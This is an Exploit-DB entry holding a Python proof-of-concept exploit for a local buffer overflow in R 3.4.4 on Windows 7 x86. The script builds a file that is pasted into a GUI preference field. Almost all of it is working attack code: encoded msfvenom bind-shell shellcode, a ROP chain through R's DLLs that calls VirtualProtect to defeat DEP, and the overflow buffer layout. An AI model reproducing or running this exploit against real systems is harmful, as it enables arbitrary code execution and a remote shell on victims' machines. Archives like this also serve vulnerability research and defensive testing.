R v3.4.4 - Local Buffer Overflow (DEP Bypass)

EDB-ID: 44680
Author: Hashim Jawad
Published: 2018-05-21
CVE: N/A
Type: Local
Platform: Windows_x86
Vulnerable App: N/A

 # Exploit Author: Hashim Jawad 
# Exploit Date: 2018-05-21
# Vendor Homepage: https://www.r-project.org/
# Vulnerable Software: https://www.exploit-db.com/apps/a642a3de7b5c2602180e73f4c04b4fbd-R-3.4.4-win.exe
# Tested on OS: Microsoft Windows 7 Enterprise - SP1 (x86)
# Steps to reproduce: under GUI preferences, paste payload.txt contents into 'Language for menus and messages'

# Credit to bzyo for finding the bug (44516)

#!/usr/bin/python

import struct

#root@kali:~# msfvenom -p windows/shell_bind_tcp -e x86/alpha_mixed -b "\x00\x0a\x0d\x0e" -f python -v shellcode
#Payload size: 718 bytes
shellcode = ""
shellcode += "\x89\xe0\xdb\xd2\xd9\x70\xf4\x5b\x53\x59\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43"
shellcode += "\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30"
shellcode += "\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30"
shellcode += "\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
shellcode += "\x69\x6c\x59\x78\x6c\x42\x77\x70\x33\x30\x37\x70"
shellcode += "\x31\x70\x6b\x39\x6a\x45\x65\x61\x39\x50\x72\x44"
shellcode += "\x6e\x6b\x30\x50\x56\x50\x4e\x6b\x62\x72\x56\x6c"
shellcode += "\x6c\x4b\x31\x42\x34\x54\x4c\x4b\x62\x52\x64\x68"
shellcode += "\x56\x6f\x68\x37\x70\x4a\x61\x36\x55\x61\x79\x6f"
shellcode += "\x6e\x4c\x75\x6c\x73\x51\x51\x6c\x67\x72\x46\x4c"
shellcode += "\x57\x50\x4b\x71\x5a\x6f\x36\x6d\x76\x61\x6b\x77"
shellcode += "\x7a\x42\x39\x62\x76\x32\x73\x67\x6e\x6b\x36\x32"
shellcode += "\x72\x30\x4e\x6b\x73\x7a\x55\x6c\x4e\x6b\x62\x6c"
shellcode += "\x42\x31\x72\x58\x38\x63\x51\x58\x35\x51\x6b\x61"
shellcode += "\x52\x71\x4e\x6b\x72\x79\x31\x30\x57\x71\x78\x53"
shellcode += "\x6c\x4b\x50\x49\x64\x58\x6b\x53\x77\x4a\x70\x49"
shellcode += "\x6e\x6b\x37\x44\x4e\x6b\x67\x71\x4b\x66\x45\x61"
shellcode += "\x69\x6f\x6c\x6c\x49\x51\x6a\x6f\x46\x6d\x57\x71"
shellcode += "\x5a\x67\x56\x58\x39\x70\x42\x55\x4b\x46\x74\x43"
shellcode += "\x53\x4d\x59\x68\x35\x6b\x73\x4d\x47\x54\x64\x35"
shellcode += "\x5a\x44\x36\x38\x6c\x4b\x56\x38\x57\x54\x76\x61"
shellcode += "\x38\x53\x43\x56\x4c\x4b\x64\x4c\x30\x4b\x6c\x4b"
shellcode += "\x33\x68\x35\x4c\x57\x71\x59\x43\x6c\x4b\x36\x64"
shellcode += "\x6c\x4b\x46\x61\x4e\x30\x6b\x39\x63\x74\x47\x54"
shellcode += "\x55\x74\x31\x4b\x43\x6b\x50\x61\x71\x49\x52\x7a"
shellcode += "\x62\x71\x6b\x4f\x6b\x50\x61\x4f\x51\x4f\x32\x7a"
shellcode += "\x6c\x4b\x66\x72\x5a\x4b\x4c\x4d\x71\x4d\x50\x68"
shellcode += "\x76\x53\x45\x62\x65\x50\x75\x50\x31\x78\x73\x47"
shellcode += "\x71\x63\x74\x72\x31\x4f\x62\x74\x75\x38\x50\x4c"
shellcode += "\x70\x77\x55\x76\x36\x67\x49\x6f\x6b\x65\x6d\x68"
shellcode += "\x7a\x30\x73\x31\x55\x50\x65\x50\x36\x49\x78\x44"
shellcode += "\x33\x64\x62\x70\x65\x38\x65\x79\x6d\x50\x30\x6b"
shellcode += "\x43\x30\x39\x6f\x39\x45\x31\x7a\x56\x68\x70\x59"
shellcode += "\x70\x50\x69\x72\x59\x6d\x37\x30\x70\x50\x71\x50"
shellcode += "\x50\x50\x33\x58\x39\x7a\x46\x6f\x79\x4f\x6d\x30"
shellcode += "\x59\x6f\x69\x45\x7a\x37\x75\x38\x65\x52\x43\x30"
shellcode += "\x37\x61\x63\x6c\x4f\x79\x5a\x46\x31\x7a\x34\x50"
shellcode += "\x30\x56\x31\x47\x45\x38\x39\x52\x79\x4b\x66\x57"
shellcode += "\x42\x47\x59\x6f\x5a\x75\x50\x57\x51\x78\x6c\x77"
shellcode += "\x48\x69\x54\x78\x69\x6f\x6b\x4f\x59\x45\x72\x77"
shellcode += "\x75\x38\x33\x44\x7a\x4c\x75\x6b\x39\x71\x49\x6f"
shellcode += "\x78\x55\x71\x47\x6c\x57\x75\x38\x70\x75\x70\x6e"
shellcode += "\x42\x6d\x35\x31\x79\x6f\x38\x55\x72\x48\x70\x63"
shellcode += "\x42\x4d\x71\x74\x37\x70\x4f\x79\x79\x73\x71\x47"
shellcode += "\x70\x57\x71\x47\x74\x71\x78\x76\x53\x5a\x42\x32"
shellcode += "\x62\x79\x52\x76\x6b\x52\x59\x6d\x35\x36\x79\x57"
shellcode += "\x52\x64\x35\x74\x57\x4c\x37\x71\x43\x31\x4e\x6d"
shellcode += "\x50\x44\x36\x44\x56\x70\x59\x56\x47\x70\x42\x64"
shellcode += "\x46\x34\x70\x50\x36\x36\x50\x56\x50\x56\x71\x56"
shellcode += "\x42\x76\x30\x4e\x73\x66\x76\x36\x66\x33\x76\x36"
shellcode += "\x32\x48\x42\x59\x68\x4c\x55\x6f\x6d\x56\x49\x6f"
shellcode += "\x6b\x65\x4b\x39\x59\x70\x72\x6e\x70\x56\x51\x56"
shellcode += "\x4b\x4f\x34\x70\x51\x78\x34\x48\x4e\x67\x37\x6d"
shellcode += "\x51\x70\x59\x6f\x38\x55\x6d\x6b\x6c\x30\x48\x35"
shellcode += "\x69\x32\x72\x76\x62\x48\x4c\x66\x5a\x35\x4f\x4d"
shellcode += "\x4d\x4d\x69\x6f\x4a\x75\x65\x6c\x67\x76\x73\x4c"
shellcode += "\x47\x7a\x4f\x70\x59\x6b\x4b\x50\x70\x75\x57\x75"
shellcode += "\x6f\x4b\x53\x77\x55\x43\x64\x32\x52\x4f\x51\x7a"
shellcode += "\x53\x30\x46\x33\x4b\x4f\x4b\x65\x41\x41"

'''
Output generated by mona.py v2.0, rev 582 - Immunity Debugger
--------------------------------------------
Register setup for VirtualProtect() :
--------------------------------------------
EAX = NOP (0x90909090)
ECX = lpOldProtect (ptr to W address)
EDX = NewProtect (0x40)
EBX = dwSize
ESP = lPAddress (automatic)
EBP = ReturnTo (ptr to jmp esp)
ESI = ptr to VirtualProtect()
EDI = ROP NOP (RETN)
--------------------------------------------
'''

rop = struct.pack('<L', 0x6cacc7e2) # POP EAX # RETN [R.dll]
rop += struct.pack('<L', 0x643cb170) # ptr to &VirtualProtect() [IAT Riconv.dll]
rop += struct.pack('<L', 0x6e7d5435) # MOV EAX,DWORD PTR DS:[EAX] # RETN [utils.dll]
rop += struct.pack('<L', 0x6ca347fa) # XCHG EAX,ESI # RETN [R.dll]
rop += struct.pack('<L', 0x6cb7429a) # POP EBP # RETN [R.dll]
rop += struct.pack('<L', 0x6ca2a9bd) # & jmp esp [R.dll]
rop += struct.pack('<L', 0x64c45db2) # POP EAX # RETN [methods.dll]
rop += struct.pack('<L', 0xfffffaff) # value to negate, will become 0x00000501
rop += struct.pack('<L', 0x643c361a) # NEG EAX # RETN [Riconv.dll]
rop += struct.pack('<L', 0x6ca33b8a) # XCHG EAX,EBX # RETN [R.dll]
rop += struct.pack('<L', 0x6cbef3e4) # POP EAX # RETN [R.dll]
rop += struct.pack('<L', 0xffffffc0) # Value to negate, will become 0x00000040
rop += struct.pack('<L', 0x6ff3a39a) # NEG EAX # RETN [grDevices.dll]
rop += struct.pack('<L', 0x6ca558be) # XCHG EAX,EDX # RETN [R.dll]
rop += struct.pack('<L', 0x6cbe90a8) # POP ECX # RETN [R.dll]
rop += struct.pack('<L', 0x6ff863c1) # &Writable location [grDevices.dll]
rop += struct.pack('<L', 0x6cbe097f) # POP EDI # RETN [R.dll]
rop += struct.pack('<L', 0x6375fe5c) # RETN (ROP NOP) [Rgraphapp.dll]
rop += struct.pack('<L', 0x6c998f58) # POP EAX # RETN [R.dll]
rop += struct.pack('<L', 0x90909090) # nop
rop += struct.pack('<L', 0x6fedfa6c) # PUSHAD # RETN [grDevices.dll]

buffer = '\x41' * 292 # filler to EIP
buffer += struct.pack('<L', 0x6fef93c6) # POP ESI # RETN [grDevices.dll]
buffer += '\x41' * 4 # compensate for pop esi
buffer += rop
buffer += '\x90' * 50
buffer += shellcode
buffer += '\x90' * (5000-292-4-4-len(rop)-50-len(shellcode))

try:
f=open('payload.txt','w')
print '[+] Creating %s bytes evil payload..' %len(buffer)
f.write(buffer)
f.close()
print '[+] File created!'
except Exception as e:
print e

Related Posts